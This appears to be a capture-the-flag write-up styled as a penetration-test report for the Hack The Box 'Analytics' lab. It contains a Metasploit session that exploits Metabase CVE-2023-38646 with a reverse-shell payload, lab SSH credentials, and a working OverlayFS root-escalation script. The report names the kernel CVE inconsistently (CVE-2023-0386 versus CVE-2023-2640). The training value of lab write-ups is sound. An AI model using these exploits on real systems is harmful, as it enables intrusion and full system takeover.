Analytics - Pentest Report
Executive Summary
HackTheBox contracted Otrashoui Cybersecurity Services™ to perform a Network Penetration Test of one of Hack The Box’s internal hosts to identify security weaknesses, determine the impact to HackTheBox, and provide remediation recommendations.
Approach
Otrashoui Cybersecurity Services™ performed testing under a “black box” approach without credentials or any prior knowledge of HackTheBox’s environment.
Scope
| Host | Description |
|---|---|
| IP | ?? |
Assessment Overview and Recommendations
During the Penetration test against HackTheBox, Otrashoui Cybersecurity Services™ identified two (2) findings that affect HackTheBox’s information security posture.
The first finding involved a vulnerable version of the Metabase application. This vulnerability allows unauthenticated users to remotely execute commands on the underlying server. This issue is fixed in the latest Metabase version.
The other finding involved a vulnerable version of the Linux kernel on a Ubuntu system. This vulnerability allows low privileged users to gain full administrative access on the system. Updating the system to the latest Linux kernel will fix the issue.
Summary of Findings
The following table presents a summary of findings by severity level:
| High | Medium | Low | Total |
|---|---|---|---|
| 2 | 0 | 0 | 2 |
Below is a high-level overview of each finding identified during the assessment. These findings are covered in depth in the Technical Findings Details section of this report:
| Name | Severity |
|---|---|
| Vulnerable Software (CVE-2023-38646) | High |
| Vulnerable Linux Kernel (CVE-2023-0386) | High |
Exploitation Walkthrough
During the course of the assessment, Otrashoui Cybersecurity Services™ was able to gain a foothold and compromise the in-scope host. The steps below demonstrate how the tester went from unauthenticated user to administrative access on the host.
Detailed Walkthrough
- The Metabase instance was vulnerable to CVE-2023-38646, a remote code execution vulnerability.
- The Metabase instance was running in a Docker container, but it was possible to escape it by finding SSH credentials in environment variables (password re-use).
- The host was running a vulnerable version of the Linux kernel (CVE-2023-2640), which allowed unprivileged users to escalate privileges and get full administrative access on the system.
Reproduction Steps
In the following code snippets, [...] is used to discard irrelevant output in the current context. Additionally, lines starting with the $ character indicate a system command typed by the tester.
Using the Metasploit module to exploit the vulnerability, and achieve remote code execution on the system:
msf6 > search metabase [776/799]
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/metabase_setup_token_rce 2023-07-22 excellent Yes Metabase Setup Token RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/metabase_setup_token_rce
msf6 > use 0
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/metabase_setup_token_rce) > set LHOST tun0
LHOST => 10.10.14.93
msf6 exploit(linux/http/metabase_setup_token_rce) > set RHOSTS 10.129.135.20
RHOSTS => 10.129.135.20
msf6 exploit(linux/http/metabase_setup_token_rce) > set VHOST data.analytical.htb
VHOST => data.analytical.htb
msf6 exploit(linux/http/metabase_setup_token_rce) > set RPORT 80
RPORT => 80
msf6 exploit(linux/http/metabase_setup_token_rce) > run
[*] Started reverse TCP handler on 10.10.14.93:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.46.6
[+] Found setup token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
[*] Sending exploit (may take a few seconds)
[*] Command shell session 1 opened (10.10.14.93:4444 -> 10.129.135.20:54808) at 2023-10-08 11:09:47 +0200
whoami ; uname -a ; ip a
metabase
Linux 7b083230dd9d 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 Linux
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft foreverSSH credentials are present in environment variables:
7b083230dd9d:/$ env
[...]
META_USER=metalytics
META_PASS=An4lytics_ds20223#
[...]With these, it is possible to get access to the analytics host:
$ ssh metalytics@analytical.htb
[...]
metalytics@analytics:~$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/LinuxThis Linux kernel version is vulnerable on Ubuntu systems. It is a flaw in the OverlayFS filesystem which allows creating privileged executables that grant the ability to execute commands as the superuser.
Using the proof of concept from this Github repository:
#!/bin/sh
set -e
unshare -rm sh -c "mkdir -p l u w m ;
cp /usr/bin/python3 l/ ;
setcap cap_setuid+eip l/python3 ;
mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m ;
touch m/*"
u/python3 -c 'import os;os.setuid(0);os.system("id")'This script is using the vulnerability to grant the /usr/bin/python3 executable permission to execute the setuid() system call, which allows executing commands as root:
metalytics@analytics:~$ chmod +x exp.sh
metalytics@analytics:~$ id
uid=1000(metalytics) gid=1000(metalytics) groups=1000(metalytics)
metalytics@analytics:~$ ./exp.sh
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)Remediation Summary
Short Term
- Update Metabase to the latest version.
- Update the kernel, or apply security patches distributed by Ubuntu.
Medium Term
- Consider implementing an enterprise password manager to avoid password re-use.
Long Term
- Perform periodic vulnerability scans
Technical Findings Details
1. Vulnerable Software (CVE-2023-38646) - High
| CWE | 1395 |
|---|---|
| CVSS 3.1 Score | 9.8 |
| Affected Application | http://data.analytical.htb |
| Description | The application is using a vulnerable version of the Metabase software, granting remote code execution capabilities. |
| Impact | An attacker can use this vulnerability to get remote access to the underlying server, potentially getting access to sensitive files or compromising other hosts in the internal network. |
| Remediation | Update Metabase to the latest version. |
| External References | https://blog.calif.io/p/reproducing-cve-2023-38646-metabase |
Evidence
Using the Metasploit module to exploit the vulnerability:
msf6 > search metabase [776/799]
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/metabase_setup_token_rce 2023-07-22 excellent Yes Metabase Setup Token RCE
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/metabase_setup_token_rce
msf6 > use 0
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/metabase_setup_token_rce) > set LHOST tun0
LHOST => 10.10.14.93
msf6 exploit(linux/http/metabase_setup_token_rce) > set RHOSTS 10.129.135.20
RHOSTS => 10.129.135.20
msf6 exploit(linux/http/metabase_setup_token_rce) > set VHOST data.analytical.htb
VHOST => data.analytical.htb
msf6 exploit(linux/http/metabase_setup_token_rce) > set RPORT 80
RPORT => 80
msf6 exploit(linux/http/metabase_setup_token_rce) > run
[*] Started reverse TCP handler on 10.10.14.93:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.46.6
[+] Found setup token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
[*] Sending exploit (may take a few seconds)
[*] Command shell session 1 opened (10.10.14.93:4444 -> 10.129.135.20:54808) at 2023-10-08 11:09:47 +0200
whoami ; uname -a ; ip a
metabase
Linux 7b083230dd9d 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 Linux
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever2. Vulnerable Linux Kernel (CVE-2023-2640) - High
| CWE | 1395 |
|---|---|
| CVSS 3.1 Score | 7.8 |
| Affected Host | analytics |
| Description | The Linux kernel version 6.2.0 on the Ubuntu distribution has a vulnerable component (OverlayFS) that allows unprivileged users to gain root access. |
| Impact | An unprivileged attacker already present on the local system can use this vulnerability to escalate privileges and gain full administrative access on the host. |
| Remediation | Update the kernel, or apply security patches distributed by Ubuntu. |
| External References | https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability |
Evidence
Using the proof of concept from this Github repository:
#!/bin/sh
set -e
unshare -rm sh -c "mkdir -p l u w m ;
cp /u*/b*/p*3 l/ ;
setcap cap_setuid+eip l/python3 ;
mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m ;
touch m/*"
u/python3 -c 'import os;os.setuid(0);os.system("id")'Run the exploit script:
metalytics@analytics:~$ chmod +x exp.sh
metalytics@analytics:~$ id
uid=1000(metalytics) gid=1000(metalytics) groups=1000(metalytics)
metalytics@analytics:~$ ./exp.sh
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)